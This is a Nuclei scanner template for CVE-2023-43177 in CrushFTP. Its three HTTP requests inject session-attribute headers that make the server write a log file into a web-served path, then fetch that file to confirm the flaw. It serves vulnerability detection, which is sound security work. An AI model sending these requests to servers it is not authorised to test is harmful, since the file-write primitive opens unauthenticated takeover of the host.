id: CVE-2023-43177 info: name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-43177 - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/ - https://blog.projectdiscovery.io/crushftp-rce/ - https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-43177 cwe-id: CWE-913 epss-score: 0.92767 epss-percentile: 0.98966 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: crushftp product: crushftp tags: cve,cve2023,crushftp,unauth,rce,intrusive flow: http(1) && http(2) && http(3) variables: dirname: "{{randbase(5)}}" filename: "{{randbase(5)}}" http: - method: GET path: - "{{BaseURL}}/WebInterface" matchers: - type: dsl internal: true dsl: - contains_all(to_lower(header), "currentauth", "crushauth") - method: POST path: - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}" headers: Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}" as2-to: X user_name: crushadmin{{dirname}} user_log_path: "./WebInterface/{{dirname}}/" user_log_file: "{{filename}}" Content-Type: application/x-www-form-urlencoded body: | post=body matchers: - type: regex regex: - "crushadmin" - method: GET path: - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}" matchers: - type: dsl dsl: - status_code == 200 - contains(body, "crushadmin{{dirname}}") condition: and # digest: 4a0a00473045022100830445e9bba00a117daddfca1259b9ef7a022d6fe27e13f9cb7b40949407bd9c02204a02f01f53e956fcc4b5e30944fd8a5bc1bb49d9f20ff4fb78329f46f5adf916:922c64590222798bb761d5b6d8e72950